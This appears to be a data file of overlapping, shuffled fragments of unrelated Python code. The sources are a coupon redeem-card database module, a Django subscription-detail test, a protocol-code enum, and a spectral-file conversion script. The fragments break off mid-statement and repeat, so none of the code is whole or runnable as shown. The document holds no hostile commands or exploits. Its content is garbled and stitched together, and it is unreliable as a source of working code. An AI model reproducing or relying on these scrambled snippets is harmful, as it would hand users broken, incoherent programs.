\"\"\"DELETE FROM redeem_card WHERE redeem_code = %(redeem_code)s\"\"\"", "the input data value = str(value).strip() batch = str(batch).strip() # Check is the", "data value = str(value).strip() batch = str(batch).strip() # Check is the input valid", "= \"\"\"SELECT * FROM redeem_card ORDER BY redeem_code ASC\"\"\" if not int(limit) ==", "user_id = %(user_id)s\"\"\" new_balance = user['balance'] + redeem_card['value'] cursor.execute(sql, {'new_balance': new_balance, 'user_id': user_id})", "{'redeem_code': redeem_code}) dao.commit() def find_redeem_card(redeem_code): # Clean the input data param = str(redeem_code).strip()", "= dao.cursor() # Check if the redeem card exists if find_redeem_card(redeem_code) is None:", "len(char_set)-1)]) for n in range(0, 16)]) def add_redeem_cards(value, batch = 1): # Clean", "' OFFSET ' + offset cursor.execute(sql) result = cursor.fetchall() return result def redeem(user_id,", "'user_id': user_id}) sql = \"\"\"DELETE FROM redeem_card WHERE redeem_code = %(redeem_code)s\"\"\" cursor.execute(sql, {'redeem_code':", "db connection dao = DAO() cursor = dao.cursor() # Check if the redeem", "range(int(batch)): cursor.execute(sql, {'redeem_code': generate_random_coupon_code(), 'value': value}) # Commit every 10 writes if (i", "of length 16 return ''.join([str(char_set[randint(0, len(char_set)-1)]) for n in range(0, 16)]) def add_redeem_cards(value,", "user is None: raise ValidationError('user not found.') # Establish db connection dao =", "# Check is the input valid if not is_money(value) or not batch.isdecimal(): raise", "Establish db connection dao = DAO() cursor = dao.cursor() # Query database sql", "find_redeem_card(redeem_code) if redeem_card is None: raise ValidationError('Invalid redeen code.') # Find user user", "= DAO() cursor = dao.cursor() # Query database sql = \"\"\"SELECT * FROM", "Generate a coupon code of length 16 return ''.join([str(char_set[randint(0, len(char_set)-1)]) for n in", "# Clean the input data redeem_code = str(redeem_code).strip() # Establish db connection dao", "result = cursor.fetchone() return result def get_redeem_cards(limit = 0, offset = 0): #", "DAO() cursor = dao.cursor() sql = \"\"\"INSERT INTO redeem_card ( redeem_code, value )", "= 1): # Clean the input data value = str(value).strip() batch = str(batch).strip()", "data param = str(redeem_code).strip() # Establish db connection dao = DAO() cursor =", "10 writes if (i + 1) % 10 == 0: dao.commit() dao.commit() def", "DAO() cursor = dao.cursor() sql = \"\"\"UPDATE user SET balance = %(new_balance)s WHERE", "dao.commit() def find_redeem_card(redeem_code): # Clean the input data param = str(redeem_code).strip() # Establish", "%(redeem_code)s, %(value)s )\"\"\" for i in range(int(batch)): cursor.execute(sql, {'redeem_code': generate_random_coupon_code(), 'value': value}) #", "generate_random_coupon_code(), 'value': value}) # Commit every 10 writes if (i + 1) %", "offset = 0): # Clean the input data limit = str(limit).strip() offset =", "ValidationError('Invalid redeen code.') # Find user user = find_user(method = 'id', param =", "= dao.cursor() sql = \"\"\"INSERT INTO redeem_card ( redeem_code, value ) VALUES (", "user SET balance = %(new_balance)s WHERE user_id = %(user_id)s\"\"\" new_balance = user['balance'] +", "import string from random import randint # Prepare the char set for the", "SET balance = %(new_balance)s WHERE user_id = %(user_id)s\"\"\" new_balance = user['balance'] + redeem_card['value']", "= dao.cursor() # Query database sql = \"\"\"SELECT * FROM redeem_card ORDER BY", "redeem card does not exists.') sql = \"\"\"DELETE FROM redeem_card WHERE redeem_code =", "Clean the input data redeem_code = str(redeem_code).strip() # Establish db connection dao =", "# Establish db connection dao = DAO() cursor = dao.cursor() sql = \"\"\"INSERT", "find_redeem_card(redeem_code) is None: raise ValidationError('The redeem card does not exists.') sql = \"\"\"DELETE", "%(redeem_code)s\"\"\" cursor.execute(sql, {'redeem_code': redeem_code}) dao.commit() def find_redeem_card(redeem_code): # Clean the input data param", "raise ValidationError('IInvalid pagination parameters.') # Establish db connection dao = DAO() cursor =", "user_id = str(user_id).strip() redeem_code = str(redeem_code).strip() # Find redeem card redeem_card = find_redeem_card(redeem_code)", "%(new_balance)s WHERE user_id = %(user_id)s\"\"\" new_balance = user['balance'] + redeem_card['value'] cursor.execute(sql, {'new_balance': new_balance,", "the char set according to your needs # The char set contains all", "data limit = str(limit).strip() offset = str(offset).strip() if not limit.isdecimal() or not offset.isdecimal():", "card redeem_card = find_redeem_card(redeem_code) if redeem_card is None: raise ValidationError('Invalid redeen code.') #", "str(redeem_code).strip() # Establish db connection dao = DAO() cursor = dao.cursor() # Query", "' + offset cursor.execute(sql) result = cursor.fetchall() return result def redeem(user_id, redeem_code): #", "find_user import string from random import randint # Prepare the char set for", "sql = \"\"\"DELETE FROM redeem_card WHERE redeem_code = %(redeem_code)s\"\"\" cursor.execute(sql, {'redeem_code': redeem_code}) dao.commit()", "# Find user user = find_user(method = 'id', param = user_id) if user", "set for the coupon code # Modify the char set according to your", "contains all upper case letters and 0 to 9 char_set = list(string.ascii_uppercase) [char_set.append(n)", "user user = find_user(method = 'id', param = user_id) if user is None:", "and 0 to 9 char_set = list(string.ascii_uppercase) [char_set.append(n) for n in range(0, 10)]", "VALUES ( %(redeem_code)s, %(value)s )\"\"\" for i in range(int(batch)): cursor.execute(sql, {'redeem_code': generate_random_coupon_code(), 'value':", "cursor = dao.cursor() # Query database sql = \"\"\"SELECT * FROM redeem_card WHERE", "db connection dao = DAO() cursor = dao.cursor() sql = \"\"\"INSERT INTO redeem_card", "DAO() cursor = dao.cursor() # Check if the redeem card exists if find_redeem_card(redeem_code)", "new_balance = user['balance'] + redeem_card['value'] cursor.execute(sql, {'new_balance': new_balance, 'user_id': user_id}) sql = \"\"\"DELETE", "cursor.execute(sql, {'new_balance': new_balance, 'user_id': user_id}) sql = \"\"\"DELETE FROM redeem_card WHERE redeem_code =", "{'redeem_code': redeem_code}) result = cursor.fetchone() return result def get_redeem_cards(limit = 0, offset =", "# Find redeem card redeem_card = find_redeem_card(redeem_code) if redeem_card is None: raise ValidationError('Invalid", "input type.') # Establish db connection dao = DAO() cursor = dao.cursor() sql", "database sql = \"\"\"SELECT count(redeem_code) as len FROM redeem_card\"\"\" cursor.execute(sql) length = cursor.fetchone()['len']", "connection dao = DAO() cursor = dao.cursor() # Check if the redeem card", "FROM redeem_card WHERE redeem_code = %(redeem_code)s\"\"\" cursor.execute(sql, {'redeem_code': redeem_code}) dao.commit() def count_records_length(): #", "n in range(0, 10)] def generate_random_coupon_code(): # Generate a coupon code of length", "redeem_code = str(redeem_code).strip() # Establish db connection dao = DAO() cursor = dao.cursor()", "\"\"\"SELECT * FROM redeem_card WHERE redeem_code = %(redeem_code)s\"\"\" cursor.execute(sql, {'redeem_code': redeem_code}) result =", "%(user_id)s\"\"\" new_balance = user['balance'] + redeem_card['value'] cursor.execute(sql, {'new_balance': new_balance, 'user_id': user_id}) sql =", "dao.cursor() sql = \"\"\"UPDATE user SET balance = %(new_balance)s WHERE user_id = %(user_id)s\"\"\"", "dao.cursor() sql = \"\"\"INSERT INTO redeem_card ( redeem_code, value ) VALUES ( %(redeem_code)s,", "redeem_card is None: raise ValidationError('Invalid redeen code.') # Find user user = find_user(method", "raise ValidationError('Invalid input type.') # Establish db connection dao = DAO() cursor =", "Establish db connection dao = DAO() cursor = dao.cursor() sql = \"\"\"INSERT INTO", "ValidationError('Invalid input type.') # Establish db connection dao = DAO() cursor = dao.cursor()", "dao.commit() dao.commit() def delete_redeem_card(redeem_code): # Clean the input data redeem_code = str(redeem_code).strip() #", "new_balance, 'user_id': user_id}) sql = \"\"\"DELETE FROM redeem_card WHERE redeem_code = %(redeem_code)s\"\"\" cursor.execute(sql,", "result def redeem(user_id, redeem_code): # Clean the input data user_id = str(user_id).strip() redeem_code", "coupon code of length 16 return ''.join([str(char_set[randint(0, len(char_set)-1)]) for n in range(0, 16)])", "if user is None: raise ValidationError('user not found.') # Establish db connection dao", "batch.isdecimal(): raise ValidationError('Invalid input type.') # Establish db connection dao = DAO() cursor", "writes if (i + 1) % 10 == 0: dao.commit() dao.commit() def delete_redeem_card(redeem_code):", "db connection dao = DAO() cursor = dao.cursor() # Query database sql =", "set according to your needs # The char set contains all upper case", "random import randint # Prepare the char set for the coupon code #", "''.join([str(char_set[randint(0, len(char_set)-1)]) for n in range(0, 16)]) def add_redeem_cards(value, batch = 1): #", "redeen code.') # Find user user = find_user(method = 'id', param = user_id)", "10)] def generate_random_coupon_code(): # Generate a coupon code of length 16 return ''.join([str(char_set[randint(0,", "redeem_code}) dao.commit() def find_redeem_card(redeem_code): # Clean the input data param = str(redeem_code).strip() #", "Check is the input valid if not is_money(value) or not batch.isdecimal(): raise ValidationError('Invalid", "Establish db connection dao = DAO() cursor = dao.cursor() # Check if the", "+ limit + ' OFFSET ' + offset cursor.execute(sql) result = cursor.fetchall() return", "offset.isdecimal(): raise ValidationError('IInvalid pagination parameters.') # Establish db connection dao = DAO() cursor", "= DAO() cursor = dao.cursor() sql = \"\"\"UPDATE user SET balance = %(new_balance)s", "input data value = str(value).strip() batch = str(batch).strip() # Check is the input", "dao.commit() def count_records_length(): # Establish db connection dao = DAO() cursor = dao.cursor()", "redeem_card ( redeem_code, value ) VALUES ( %(redeem_code)s, %(value)s )\"\"\" for i in", "code # Modify the char set according to your needs # The char", "list(string.ascii_uppercase) [char_set.append(n) for n in range(0, 10)] def generate_random_coupon_code(): # Generate a coupon", "str(batch).strip() # Check is the input valid if not is_money(value) or not batch.isdecimal():", "== 0: sql += ' LIMIT ' + limit + ' OFFSET '", "offset cursor.execute(sql) result = cursor.fetchall() return result def redeem(user_id, redeem_code): # Clean the", "import is_money from models.shared import find_user import string from random import randint #", "not batch.isdecimal(): raise ValidationError('Invalid input type.') # Establish db connection dao = DAO()", "return result def get_redeem_cards(limit = 0, offset = 0): # Clean the input", "%(redeem_code)s\"\"\" cursor.execute(sql, {'redeem_code': redeem_code}) result = cursor.fetchone() return result def get_redeem_cards(limit = 0,", "user_id}) sql = \"\"\"DELETE FROM redeem_card WHERE redeem_code = %(redeem_code)s\"\"\" cursor.execute(sql, {'redeem_code': redeem_code})", "def add_redeem_cards(value, batch = 1): # Clean the input data value = str(value).strip()", "DAO from utils.exception import ValidationError from utils.validation import is_money from models.shared import find_user", "= \"\"\"SELECT count(redeem_code) as len FROM redeem_card\"\"\" cursor.execute(sql) length = cursor.fetchone()['len'] return length", "= str(redeem_code).strip() # Find redeem card redeem_card = find_redeem_card(redeem_code) if redeem_card is None:", "upper case letters and 0 to 9 char_set = list(string.ascii_uppercase) [char_set.append(n) for n", "None: raise ValidationError('The redeem card does not exists.') sql = \"\"\"DELETE FROM redeem_card", "redeem_code): # Clean the input data user_id = str(user_id).strip() redeem_code = str(redeem_code).strip() #", "ValidationError from utils.validation import is_money from models.shared import find_user import string from random", "i in range(int(batch)): cursor.execute(sql, {'redeem_code': generate_random_coupon_code(), 'value': value}) # Commit every 10 writes", "if find_redeem_card(redeem_code) is None: raise ValidationError('The redeem card does not exists.') sql =", "limit.isdecimal() or not offset.isdecimal(): raise ValidationError('IInvalid pagination parameters.') # Establish db connection dao", "9 char_set = list(string.ascii_uppercase) [char_set.append(n) for n in range(0, 10)] def generate_random_coupon_code(): #", "Query database sql = \"\"\"SELECT * FROM redeem_card ORDER BY redeem_code ASC\"\"\" if", "user_id) if user is None: raise ValidationError('user not found.') # Establish db connection", "value = str(value).strip() batch = str(batch).strip() # Check is the input valid if", "cursor.execute(sql) result = cursor.fetchall() return result def redeem(user_id, redeem_code): # Clean the input", "from random import randint # Prepare the char set for the coupon code", "# Modify the char set according to your needs # The char set", "db connection dao = DAO() cursor = dao.cursor() sql = \"\"\"UPDATE user SET", "not offset.isdecimal(): raise ValidationError('IInvalid pagination parameters.') # Establish db connection dao = DAO()", "cursor.fetchone() return result def get_redeem_cards(limit = 0, offset = 0): # Clean the", "raise ValidationError('The redeem card does not exists.') sql = \"\"\"DELETE FROM redeem_card WHERE", "a coupon code of length 16 return ''.join([str(char_set[randint(0, len(char_set)-1)]) for n in range(0,", "{'new_balance': new_balance, 'user_id': user_id}) sql = \"\"\"DELETE FROM redeem_card WHERE redeem_code = %(redeem_code)s\"\"\"", "# Generate a coupon code of length 16 return ''.join([str(char_set[randint(0, len(char_set)-1)]) for n", "dao = DAO() cursor = dao.cursor() # Query database sql = \"\"\"SELECT *", "letters and 0 to 9 char_set = list(string.ascii_uppercase) [char_set.append(n) for n in range(0,", "import DAO from utils.exception import ValidationError from utils.validation import is_money from models.shared import", "= dao.cursor() # Query database sql = \"\"\"SELECT * FROM redeem_card WHERE redeem_code", "return result def redeem(user_id, redeem_code): # Clean the input data user_id = str(user_id).strip()", "cursor = dao.cursor() sql = \"\"\"UPDATE user SET balance = %(new_balance)s WHERE user_id", "\"\"\"DELETE FROM redeem_card WHERE redeem_code = %(redeem_code)s\"\"\" cursor.execute(sql, {'redeem_code': redeem_code}) dao.commit() def count_records_length():", "according to your needs # The char set contains all upper case letters", "dao.cursor() # Query database sql = \"\"\"SELECT * FROM redeem_card ORDER BY redeem_code", "= cursor.fetchall() return result def redeem(user_id, redeem_code): # Clean the input data user_id", "\"\"\"INSERT INTO redeem_card ( redeem_code, value ) VALUES ( %(redeem_code)s, %(value)s )\"\"\" for" ]
[ "import TestCase from django.shortcuts import resolve_url as r from eventex.subscriptions.models import Subscription class", "django.test import TestCase from django.shortcuts import resolve_url as r from eventex.subscriptions.models import Subscription", "uuid from django.test import TestCase from django.shortcuts import resolve_url as r from eventex.subscriptions.models", "= self.response.context['subscription'] self.assertIsInstance(subscription, Subscription) def test_html(self): contents = ( self.obj.name, self.obj.cpf, self.obj.email, self.obj.phone", "self.obj.email, self.obj.phone ) for content in contents: with self.subTest(): self.assertContains(self.response, content) class SubscriptionDetailNotFound(TestCase):", "Subscription.objects.create( name='<NAME>', cpf='12345678901', email='<EMAIL>', phone='938654321' ) self.response = self.client.get(r('subscriptions:detail', self.obj.uid)) def test_get(self): self.assertEqual(200,", "def setUp(self): uid = uuid.uuid4() self.response = self.client.get(r('subscriptions:detail', uid)) def test_not_found(self): self.assertEqual(404, self.response.status_code)", "test_html(self): contents = ( self.obj.name, self.obj.cpf, self.obj.email, self.obj.phone ) for content in contents:", "self.obj.uid)) def test_get(self): self.assertEqual(200, self.response.status_code) def test_template_used(self): self.assertTemplateUsed(self.response, 'subscriptions/subscription_detail.html') def test_context(self): subscription =", "resolve_url as r from eventex.subscriptions.models import Subscription class SubscriptionDetailGet(TestCase): def setUp(self): self.obj =", "self.assertTemplateUsed(self.response, 'subscriptions/subscription_detail.html') def test_context(self): subscription = self.response.context['subscription'] self.assertIsInstance(subscription, Subscription) def test_html(self): contents =", "content) class SubscriptionDetailNotFound(TestCase): def setUp(self): uid = uuid.uuid4() self.response = self.client.get(r('subscriptions:detail', uid)) def", "subscription = self.response.context['subscription'] self.assertIsInstance(subscription, Subscription) def test_html(self): contents = ( self.obj.name, self.obj.cpf, self.obj.email,", "self.assertEqual(200, self.response.status_code) def test_template_used(self): self.assertTemplateUsed(self.response, 'subscriptions/subscription_detail.html') def test_context(self): subscription = self.response.context['subscription'] self.assertIsInstance(subscription, Subscription)", "TestCase from django.shortcuts import resolve_url as r from eventex.subscriptions.models import Subscription class SubscriptionDetailGet(TestCase):", "self.response.context['subscription'] self.assertIsInstance(subscription, Subscription) def test_html(self): contents = ( self.obj.name, self.obj.cpf, self.obj.email, self.obj.phone )", "in contents: with self.subTest(): self.assertContains(self.response, content) class SubscriptionDetailNotFound(TestCase): def setUp(self): uid = uuid.uuid4()", "django.shortcuts import resolve_url as r from eventex.subscriptions.models import Subscription class SubscriptionDetailGet(TestCase): def setUp(self):", "self.response = self.client.get(r('subscriptions:detail', self.obj.uid)) def test_get(self): self.assertEqual(200, self.response.status_code) def test_template_used(self): self.assertTemplateUsed(self.response, 'subscriptions/subscription_detail.html') def", "SubscriptionDetailNotFound(TestCase): def setUp(self): uid = uuid.uuid4() self.response = self.client.get(r('subscriptions:detail', uid)) def test_not_found(self): self.assertEqual(404,", "from django.shortcuts import resolve_url as r from eventex.subscriptions.models import Subscription class SubscriptionDetailGet(TestCase): def", "from django.test import TestCase from django.shortcuts import resolve_url as r from eventex.subscriptions.models import", "self.client.get(r('subscriptions:detail', self.obj.uid)) def test_get(self): self.assertEqual(200, self.response.status_code) def test_template_used(self): self.assertTemplateUsed(self.response, 'subscriptions/subscription_detail.html') def test_context(self): subscription", "test_template_used(self): self.assertTemplateUsed(self.response, 'subscriptions/subscription_detail.html') def test_context(self): subscription = self.response.context['subscription'] self.assertIsInstance(subscription, Subscription) def test_html(self): contents", "test_context(self): subscription = self.response.context['subscription'] self.assertIsInstance(subscription, Subscription) def test_html(self): contents = ( self.obj.name, self.obj.cpf,", "setUp(self): self.obj = Subscription.objects.create( name='<NAME>', cpf='12345678901', email='<EMAIL>', phone='938654321' ) self.response = self.client.get(r('subscriptions:detail', self.obj.uid))", "self.assertContains(self.response, content) class SubscriptionDetailNotFound(TestCase): def setUp(self): uid = uuid.uuid4() self.response = self.client.get(r('subscriptions:detail', uid))", "= Subscription.objects.create( name='<NAME>', cpf='12345678901', email='<EMAIL>', phone='938654321' ) self.response = self.client.get(r('subscriptions:detail', self.obj.uid)) def test_get(self):", "Subscription class SubscriptionDetailGet(TestCase): def setUp(self): self.obj = Subscription.objects.create( name='<NAME>', cpf='12345678901', email='<EMAIL>', phone='938654321' )", "self.obj = Subscription.objects.create( name='<NAME>', cpf='12345678901', email='<EMAIL>', phone='938654321' ) self.response = self.client.get(r('subscriptions:detail', self.obj.uid)) def", ") self.response = self.client.get(r('subscriptions:detail', self.obj.uid)) def test_get(self): self.assertEqual(200, self.response.status_code) def test_template_used(self): self.assertTemplateUsed(self.response, 'subscriptions/subscription_detail.html')", "( self.obj.name, self.obj.cpf, self.obj.email, self.obj.phone ) for content in contents: with self.subTest(): self.assertContains(self.response,", "= ( self.obj.name, self.obj.cpf, self.obj.email, self.obj.phone ) for content in contents: with self.subTest():", "def setUp(self): self.obj = Subscription.objects.create( name='<NAME>', cpf='12345678901', email='<EMAIL>', phone='938654321' ) self.response = self.client.get(r('subscriptions:detail',", "contents: with self.subTest(): self.assertContains(self.response, content) class SubscriptionDetailNotFound(TestCase): def setUp(self): uid = uuid.uuid4() self.response", "with self.subTest(): self.assertContains(self.response, content) class SubscriptionDetailNotFound(TestCase): def setUp(self): uid = uuid.uuid4() self.response =", "self.response.status_code) def test_template_used(self): self.assertTemplateUsed(self.response, 'subscriptions/subscription_detail.html') def test_context(self): subscription = self.response.context['subscription'] self.assertIsInstance(subscription, Subscription) def", "import Subscription class SubscriptionDetailGet(TestCase): def setUp(self): self.obj = Subscription.objects.create( name='<NAME>', cpf='12345678901', email='<EMAIL>', phone='938654321'", "name='<NAME>', cpf='12345678901', email='<EMAIL>', phone='938654321' ) self.response = self.client.get(r('subscriptions:detail', self.obj.uid)) def test_get(self): self.assertEqual(200, self.response.status_code)", "def test_context(self): subscription = self.response.context['subscription'] self.assertIsInstance(subscription, Subscription) def test_html(self): contents = ( self.obj.name,", "test_get(self): self.assertEqual(200, self.response.status_code) def test_template_used(self): self.assertTemplateUsed(self.response, 'subscriptions/subscription_detail.html') def test_context(self): subscription = self.response.context['subscription'] self.assertIsInstance(subscription,", "self.assertIsInstance(subscription, Subscription) def test_html(self): contents = ( self.obj.name, self.obj.cpf, self.obj.email, self.obj.phone ) for", "self.obj.cpf, self.obj.email, self.obj.phone ) for content in contents: with self.subTest(): self.assertContains(self.response, content) class", "self.obj.phone ) for content in contents: with self.subTest(): self.assertContains(self.response, content) class SubscriptionDetailNotFound(TestCase): def", "class SubscriptionDetailNotFound(TestCase): def setUp(self): uid = uuid.uuid4() self.response = self.client.get(r('subscriptions:detail', uid)) def test_not_found(self):", "= self.client.get(r('subscriptions:detail', self.obj.uid)) def test_get(self): self.assertEqual(200, self.response.status_code) def test_template_used(self): self.assertTemplateUsed(self.response, 'subscriptions/subscription_detail.html') def test_context(self):", "phone='938654321' ) self.response = self.client.get(r('subscriptions:detail', self.obj.uid)) def test_get(self): self.assertEqual(200, self.response.status_code) def test_template_used(self): self.assertTemplateUsed(self.response,", "for content in contents: with self.subTest(): self.assertContains(self.response, content) class SubscriptionDetailNotFound(TestCase): def setUp(self): uid", ") for content in contents: with self.subTest(): self.assertContains(self.response, content) class SubscriptionDetailNotFound(TestCase): def setUp(self):", "'subscriptions/subscription_detail.html') def test_context(self): subscription = self.response.context['subscription'] self.assertIsInstance(subscription, Subscription) def test_html(self): contents = (", "r from eventex.subscriptions.models import Subscription class SubscriptionDetailGet(TestCase): def setUp(self): self.obj = Subscription.objects.create( name='<NAME>',", "eventex.subscriptions.models import Subscription class SubscriptionDetailGet(TestCase): def setUp(self): self.obj = Subscription.objects.create( name='<NAME>', cpf='12345678901', email='<EMAIL>',", "from eventex.subscriptions.models import Subscription class SubscriptionDetailGet(TestCase): def setUp(self): self.obj = Subscription.objects.create( name='<NAME>', cpf='12345678901',", "import resolve_url as r from eventex.subscriptions.models import Subscription class SubscriptionDetailGet(TestCase): def setUp(self): self.obj", "SubscriptionDetailGet(TestCase): def setUp(self): self.obj = Subscription.objects.create( name='<NAME>', cpf='12345678901', email='<EMAIL>', phone='938654321' ) self.response =", "cpf='12345678901', email='<EMAIL>', phone='938654321' ) self.response = self.client.get(r('subscriptions:detail', self.obj.uid)) def test_get(self): self.assertEqual(200, self.response.status_code) def", "contents = ( self.obj.name, self.obj.cpf, self.obj.email, self.obj.phone ) for content in contents: with", "self.obj.name, self.obj.cpf, self.obj.email, self.obj.phone ) for content in contents: with self.subTest(): self.assertContains(self.response, content)", "def test_html(self): contents = ( self.obj.name, self.obj.cpf, self.obj.email, self.obj.phone ) for content in", "self.subTest(): self.assertContains(self.response, content) class SubscriptionDetailNotFound(TestCase): def setUp(self): uid = uuid.uuid4() self.response = self.client.get(r('subscriptions:detail',", "email='<EMAIL>', phone='938654321' ) self.response = self.client.get(r('subscriptions:detail', self.obj.uid)) def test_get(self): self.assertEqual(200, self.response.status_code) def test_template_used(self):", "import uuid from django.test import TestCase from django.shortcuts import resolve_url as r from", "class SubscriptionDetailGet(TestCase): def setUp(self): self.obj = Subscription.objects.create( name='<NAME>', cpf='12345678901', email='<EMAIL>', phone='938654321' ) self.response", "as r from eventex.subscriptions.models import Subscription class SubscriptionDetailGet(TestCase): def setUp(self): self.obj = Subscription.objects.create(", "def test_template_used(self): self.assertTemplateUsed(self.response, 'subscriptions/subscription_detail.html') def test_context(self): subscription = self.response.context['subscription'] self.assertIsInstance(subscription, Subscription) def test_html(self):", "def test_get(self): self.assertEqual(200, self.response.status_code) def test_template_used(self): self.assertTemplateUsed(self.response, 'subscriptions/subscription_detail.html') def test_context(self): subscription = self.response.context['subscription']", "content in contents: with self.subTest(): self.assertContains(self.response, content) class SubscriptionDetailNotFound(TestCase): def setUp(self): uid =", "Subscription) def test_html(self): contents = ( self.obj.name, self.obj.cpf, self.obj.email, self.obj.phone ) for content" ]
[ "0, \"HANDSHAKE\": 1, \"DISCONNECT\": 2, } handshake_codes = { \"UNKNOWN\": 0, \"WAITING_ACK\": 1,", "{ \"PING\": 0, \"HANDSHAKE\": 1, \"DISCONNECT\": 2, } handshake_codes = { \"UNKNOWN\": 0,", "receive_codes = { \"PING\": 0, \"HANDSHAKE\": 1, \"DISCONNECT\": 2, } handshake_codes = {", "from enum import Enum receive_codes = { \"PING\": 0, \"HANDSHAKE\": 1, \"DISCONNECT\": 2,", "import Enum receive_codes = { \"PING\": 0, \"HANDSHAKE\": 1, \"DISCONNECT\": 2, } handshake_codes", "1, \"DISCONNECT\": 2, } handshake_codes = { \"UNKNOWN\": 0, \"WAITING_ACK\": 1, \"COMPLETED\": 2", "\"PING\": 0, \"HANDSHAKE\": 1, \"DISCONNECT\": 2, } handshake_codes = { \"UNKNOWN\": 0, \"WAITING_ACK\":", "= { \"PING\": 0, \"HANDSHAKE\": 1, \"DISCONNECT\": 2, } handshake_codes = { \"UNKNOWN\":", "\"HANDSHAKE\": 1, \"DISCONNECT\": 2, } handshake_codes = { \"UNKNOWN\": 0, \"WAITING_ACK\": 1, \"COMPLETED\":", "\"DISCONNECT\": 2, } handshake_codes = { \"UNKNOWN\": 0, \"WAITING_ACK\": 1, \"COMPLETED\": 2 }", "enum import Enum receive_codes = { \"PING\": 0, \"HANDSHAKE\": 1, \"DISCONNECT\": 2, }", "Enum receive_codes = { \"PING\": 0, \"HANDSHAKE\": 1, \"DISCONNECT\": 2, } handshake_codes =" ]
[ "import views urlpatterns = [ path('', views.index), path('expand', views.expand), path('upload', views.upload), path('comment', views.add_comment),", "import path from . import views urlpatterns = [ path('', views.index), path('expand', views.expand),", "views urlpatterns = [ path('', views.index), path('expand', views.expand), path('upload', views.upload), path('comment', views.add_comment), path('public_data',", "from django.urls import path from . import views urlpatterns = [ path('', views.index),", "path from . import views urlpatterns = [ path('', views.index), path('expand', views.expand), path('upload',", "from . import views urlpatterns = [ path('', views.index), path('expand', views.expand), path('upload', views.upload),", "= [ path('', views.index), path('expand', views.expand), path('upload', views.upload), path('comment', views.add_comment), path('public_data', views.get_public_data), ]", ". import views urlpatterns = [ path('', views.index), path('expand', views.expand), path('upload', views.upload), path('comment',", "urlpatterns = [ path('', views.index), path('expand', views.expand), path('upload', views.upload), path('comment', views.add_comment), path('public_data', views.get_public_data),", "django.urls import path from . import views urlpatterns = [ path('', views.index), path('expand'," ]
[ "and output file\") exit() input = sys.argv[1] output = sys.argv[2] inputFile = pr.SpectralFile.open(input)", "an input and output file\") exit() input = sys.argv[1] output = sys.argv[2] inputFile", "# -*- coding: utf-8 -*- # Use: # pr_spec2xyz INPUT OUTPUT import sys", "len(sys.argv) != 3: print(\"Not enough arguments given. Need an input and output file\")", "for i in range(1, inputFile.height): for j in range(1, inputFile.width): spec = inputFile[i-1,", "= sys.argv[2] inputFile = pr.SpectralFile.open(input) with open(output, 'wb') as f: for i in", "sys.argv[2] inputFile = pr.SpectralFile.open(input) with open(output, 'wb') as f: for i in range(1,", "output = sys.argv[2] inputFile = pr.SpectralFile.open(input) with open(output, 'wb') as f: for i", "'__main__': if len(sys.argv) != 3: print(\"Not enough arguments given. Need an input and", "Use: # pr_spec2xyz INPUT OUTPUT import sys import struct import pypearray as pr", "with open(output, 'wb') as f: for i in range(1, inputFile.height): for j in", "j in range(1, inputFile.width): spec = inputFile[i-1, j-1] for k in range(1, pr.Spectrum.SAMPLING_COUNT):", "as pr # Main if __name__ == '__main__': if len(sys.argv) != 3: print(\"Not", "import sys import struct import pypearray as pr # Main if __name__ ==", "== '__main__': if len(sys.argv) != 3: print(\"Not enough arguments given. Need an input", "<gh_stars>10-100 #!/usr/bin/python # -*- coding: utf-8 -*- # Use: # pr_spec2xyz INPUT OUTPUT", "import pypearray as pr # Main if __name__ == '__main__': if len(sys.argv) !=", "print(\"Not enough arguments given. Need an input and output file\") exit() input =", "file\") exit() input = sys.argv[1] output = sys.argv[2] inputFile = pr.SpectralFile.open(input) with open(output,", "sys import struct import pypearray as pr # Main if __name__ == '__main__':", "for j in range(1, inputFile.width): spec = inputFile[i-1, j-1] for k in range(1,", "struct import pypearray as pr # Main if __name__ == '__main__': if len(sys.argv)", "given. Need an input and output file\") exit() input = sys.argv[1] output =", "inputFile = pr.SpectralFile.open(input) with open(output, 'wb') as f: for i in range(1, inputFile.height):", "pr # Main if __name__ == '__main__': if len(sys.argv) != 3: print(\"Not enough", "pypearray as pr # Main if __name__ == '__main__': if len(sys.argv) != 3:", "__name__ == '__main__': if len(sys.argv) != 3: print(\"Not enough arguments given. Need an", "exit() input = sys.argv[1] output = sys.argv[2] inputFile = pr.SpectralFile.open(input) with open(output, 'wb')", "if __name__ == '__main__': if len(sys.argv) != 3: print(\"Not enough arguments given. Need", "open(output, 'wb') as f: for i in range(1, inputFile.height): for j in range(1,", "# Main if __name__ == '__main__': if len(sys.argv) != 3: print(\"Not enough arguments", "as f: for i in range(1, inputFile.height): for j in range(1, inputFile.width): spec", "# pr_spec2xyz INPUT OUTPUT import sys import struct import pypearray as pr #", "OUTPUT import sys import struct import pypearray as pr # Main if __name__", "utf-8 -*- # Use: # pr_spec2xyz INPUT OUTPUT import sys import struct import", "inputFile.height): for j in range(1, inputFile.width): spec = inputFile[i-1, j-1] for k in", "# Use: # pr_spec2xyz INPUT OUTPUT import sys import struct import pypearray as", "input = sys.argv[1] output = sys.argv[2] inputFile = pr.SpectralFile.open(input) with open(output, 'wb') as", "-*- # Use: # pr_spec2xyz INPUT OUTPUT import sys import struct import pypearray", "Need an input and output file\") exit() input = sys.argv[1] output = sys.argv[2]", "range(1, inputFile.width): spec = inputFile[i-1, j-1] for k in range(1, pr.Spectrum.SAMPLING_COUNT): f.write(struct.pack(\"!f\", spec[k-1]))", "input and output file\") exit() input = sys.argv[1] output = sys.argv[2] inputFile =", "!= 3: print(\"Not enough arguments given. Need an input and output file\") exit()", "range(1, inputFile.height): for j in range(1, inputFile.width): spec = inputFile[i-1, j-1] for k", "output file\") exit() input = sys.argv[1] output = sys.argv[2] inputFile = pr.SpectralFile.open(input) with", "-*- coding: utf-8 -*- # Use: # pr_spec2xyz INPUT OUTPUT import sys import", "coding: utf-8 -*- # Use: # pr_spec2xyz INPUT OUTPUT import sys import struct", "3: print(\"Not enough arguments given. Need an input and output file\") exit() input", "f: for i in range(1, inputFile.height): for j in range(1, inputFile.width): spec =", "i in range(1, inputFile.height): for j in range(1, inputFile.width): spec = inputFile[i-1, j-1]", "arguments given. Need an input and output file\") exit() input = sys.argv[1] output", "enough arguments given. Need an input and output file\") exit() input = sys.argv[1]", "pr.SpectralFile.open(input) with open(output, 'wb') as f: for i in range(1, inputFile.height): for j", "INPUT OUTPUT import sys import struct import pypearray as pr # Main if", "in range(1, inputFile.width): spec = inputFile[i-1, j-1] for k in range(1, pr.Spectrum.SAMPLING_COUNT): f.write(struct.pack(\"!f\",", "#!/usr/bin/python # -*- coding: utf-8 -*- # Use: # 